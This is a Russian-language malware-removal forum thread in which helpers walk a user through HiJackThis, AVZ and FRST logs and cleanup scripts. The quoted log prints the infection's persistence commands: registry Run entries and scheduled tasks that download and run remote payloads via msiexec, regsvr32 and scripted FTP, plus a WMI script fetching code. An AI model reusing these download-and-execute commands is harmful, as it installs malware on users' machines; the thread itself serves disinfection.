Антивирус постоянно блокирует одни и те же объекты, сканирование ПК не помогает. Даже когда подозрительные объекты находятся в хранилище, проблема не решается.
Printable View
Антивирус постоянно блокирует одни и те же объекты, сканирование ПК не помогает. Даже когда подозрительные объекты находятся в хранилище, проблема не решается.
Уважаемый(ая) [B]DrStanislav[/B], спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
HiJackThis (из каталога [B]autologger[/B])[URL=http://virusinfo.info/showthread.php?t=4491&p=64376&viewfull=1#post64376]профиксить[/URL]
[CODE]
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxyOverride] = 127.0.0.1
O2 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file)
O2-32 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file)
O4 - HKLM\..\Run: [start1] = C:\Windows\system32\msiexec.exe /i http://js.ftp0118.info:280/helloworld.msi /q
O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0118.info:280/v.sct scrobj.dll
O4 - MSConfig\startupreg: MyDesktop [command] = C:\Users\StanislaV\AppData\Roaming\MyDesktop\linkme0120.exe /killme_30 /restoreme_5 /url_http://mpnl.ru/offers/uaby.csv /url2_http://hello.limbbo.ru/offers/uaby.csv (file missing) (HKCU) (2016/08/10)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt: Закачать ВСЕ при помощи Download Master - (no file)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt: Закачать при помощи Download Master - (no file)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt: Передать на удаленную закачку DM - (no file)
O9-32 - Button: HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no name) - (no file)
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - (no file)
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0115.ru:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for(1724 bytes)
[/CODE]
AVZ [URL=http://virusinfo.info/showthread.php?t=7239&p=88804&viewfull=1#post88804]выполнить следующий скрипт[/URL].
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
[CODE]
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\Windows\help\lsmosee.exe','');
QuarantineFile('c:\windows\debug\ok.dat','');
QuarantineFile('c:\windows\debug\item.dat','');
QuarantineFile('C:\Users\StanislaV\AppData\Roaming\TeamViewer\Java\jusched.exe','');
QuarantineFile('C:\Users\StanislaV\AppData\Roaming\MyDesktop\linkme0120.exe','');
QuarantineFile('c:\users\stanis~1\appdata\local\temp\rarsfx15\magicwifi.exe','');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\MyDesktop','command');
DeleteFile('C:\Users\StanislaV\AppData\Roaming\MyDesktop\linkme0120.exe','32');
DeleteFile('C:\Windows\system32\Tasks\Java Update Schedule','64');
DeleteFile('C:\Users\StanislaV\AppData\Roaming\TeamViewer\Java\jusched.exe','32');
DeleteFile('c:\windows\debug\item.dat','32');
DeleteFile('c:\windows\help\lsmosee.exe','32');
DeleteFile('c:\windows\debug\ok.dat','32');
DeleteFile('C:\Windows\system32\Tasks\ok','64');
DeleteFile('C:\Windows\help\lsmosee.exe','32');
ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true);
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
[/CODE]
После выполнения скрипта компьютер перезагрузится.
После перезагрузки:
- Выполните в AVZ:
[CODE]
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
[/CODE]
Файл quarantine.zip из папки AVZ загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.
- Подготовьте лог [URL="https://virusinfo.info/showthread.php?t=218752&p=1480546&viewfull=1#post1480546"]AdwCleaner[/URL] и приложите его в теме.
Лог AdwCleaner
[url=https://virusinfo.info/showthread.php?t=218752&p=1480599&viewfull=1#post1480599]Удалите в AdwCleaner[/url] всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.
Отчет после очистки
- Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]"List BCD"[/i] и [i]"Driver MD5"[/i].
[img]http://i.imgur.com/B92LqRQ.png[/img][*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
Отчет
Сами настраивали следующую политику или вам это неизвестно?
[CODE]
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e4f67768-08f0-453e-ac49-8e727168e23a} <==== ATTENTION (Restriction - IP)
[/CODE]
[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [pkijdmeepjhpenmighhaodgfoogncnlk] - <no Path/update_url>
File: C:\Windows\system32\a.exe
File: C:\Windows\system32\TmpA765.tmp
File: C:\Windows\system32\TmpA65C.tmp
File: C:\Windows\qeriuwjhrf
Zip: C:\Windows\system32\a.exe;C:\Windows\system32\TmpA765.tmp;C:\Windows\system32\TmpA65C.tmp;C:\Windows\qeriuwjhrf
2018-06-13 20:25 - 2018-06-13 20:38 - 000000000 ____D C:\Program Files (x86)\IObit
2018-06-26 07:26 - 2015-10-31 23:08 - 000000000 ____D C:\Users\Все пользователи\IObit
2018-06-26 07:26 - 2015-10-31 23:08 - 000000000 ____D C:\ProgramData\IObit
Folder: C:\Windows\Help
File: C:\Users\StanislaV\AppData\Local\BIT55ED.tmp
File: C:\Windows\SysWOW64\dlumd10.dll
File: C:\Windows\SysWOW64\dlumd11.dll
File: C:\Windows\SysWOW64\dlumd9.dll
File: C:\Windows\System32\dlumd10.dll
File: C:\Windows\System32\dlumd11.dll
File: C:\Windows\System32\dlumd9.dll
ContextMenuHandlers1: [Atheros] -> {B8952421-0E55-400B-94A6-FA858FC0A39F} => -> No File
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> No File
ContextMenuHandlers2: [RS File Recovery] -> {5DDE4698-CD62-42A2-9D87-D29AED370E3B} => -> No File
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> No File
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> No File
Task: {AF76A4C7-8044-4EFB-BABF-6A4C2663342C} - System32\Tasks\Driver Booster SkipUAC (StanislaV) => C:\Program Files (x86)\IObit\Driver Booster\4.5.0\DriverBooster.exe
Task: {4CC0C756-5618-4CF1-8EEA-B1E6AD6F0871} - \Java Update Schedule -> No File <==== ATTENTION
Task: {CB91F580-B97A-41F4-8BC0-C9C4470D5630} - System32\Tasks\Uninstaller_SkipUac_StanislaV => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\ProgramData\TEMP:6DEA77C2 [140]
AlternateDataStreams: C:\Users\Все пользователи\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:6DEA77C2 [140]
HKU\S-1-5-21-1056889933-623668751-4224552474-1000\Software\Classes\exefile: <==== ATTENTION
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
Файл [B]<date>[/B].zip (где [B]<date>[/B] текущая дата и время) c рабочего стола загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.
Сам ничего не настраивал.
[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e4f67768-08f0-453e-ac49-8e727168e23a} <==== ATTENTION (Restriction - IP)
C:\Windows\system32\a.exe
C:\Windows\qeriuwjhrf
C:\Windows\Help\lsmosee.exe
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
Лог, сделан до появления угроз.
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
Еще угрозы,до этого их не было, блокировка подключения к сайтам. Началось после выполнения последнего скрипта в Farbar Recovery Scan Tool
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
Вот еще, после всех перечисленных действий которые Вы рекомендовали сделать,угроза пропала,теперь вновь обнаружена.
приложите новый лог FRST, уточните пожалуйста указанная проблема проявляется во всех браузерах?
Пользуюсь только браузером Яндекс. Установлены также Хром и Мазила,но ими не пользуюсь.
[QUOTE=DrStanislav;1484168]Пользуюсь только браузером Яндекс. Установлены также Хром и Мазила,но ими не пользуюсь.[/QUOTE]
Но проблема в них присутствует? Необходимо понять, проблема в том, что присутствуют вредоносные расширения в яндекс-браузере?
Когда речь идет о новых логов FSRT, то необходимо выполнить заново инструкции:
- Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]"List BCD"[/i] и [i]"Driver MD5"[/i].
[img]http://i.imgur.com/B92LqRQ.png[/img][*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
В них проблем не замечал.
[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
File: C:\Windows\System32\drivers\xspltspk.sys
File: C:\Windows\SysWOW64\Drivers\vde2otc3.sys
File: C:\Program Files\Common Files\xp.dat
File: C:\Program Files\Common Files\xpdown.dat
File: C:\Windows\system32\ps
File: C:\Windows\system32\p
File: C:\Windows\system32\s
Folder: C:\Users\StanislaV\AppData\Local\RadeonSettings
File: C:\Windows\system32\Drivers\cnnctfy3.sys
File: C:\Windows\system32\Drivers\cfywlan1.sys
2018-06-26 07:26 - 2015-10-31 15:57 - 000000000 ____D C:\Users\StanislaV\AppData\Roaming\IObit
2018-06-26 07:26 - 2015-10-31 15:57 - 000000000 ____D C:\Users\StanislaV\AppData\LocalLow\IObit
2018-03-31 18:49 - 2018-03-31 18:49 - 000000000 _____ () C:\Users\StanislaV\AppData\Local\{86AAFA7F-23F2-4E8C-8BC8-E6E0A5F218EB}
File: C:\Program Files\TeamSpeak 3 Client\ts3client_win64.exe
File: C:\Users\StanislaV\Desktop\WGCheck.exe
CMD: netsh winsock reset
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
Zip: C:\Program Files\Common Files\xp.dat;C:\Program Files\Common Files\xpdown.dat;C:\Windows\system32\ps;C:\Windows\system32\p;C:\Windows\system32\s
C:\Program Files\Common Files\xp.dat
C:\Program Files\Common Files\xpdown.dat
C:\Windows\system32\ps
C:\Windows\system32\p
C:\Windows\system32\s
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
Файл <date>.zip с рабочего стола загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.
Лог
Скачайте программу [url="https://yadi.sk/d/6A65LkI1WEuqC"]Universal Virus Sniffer[/url] и [url="http://virusinfo.info/showthread.php?t=121767"]сделайте полный образ автозапуска uVS[/url].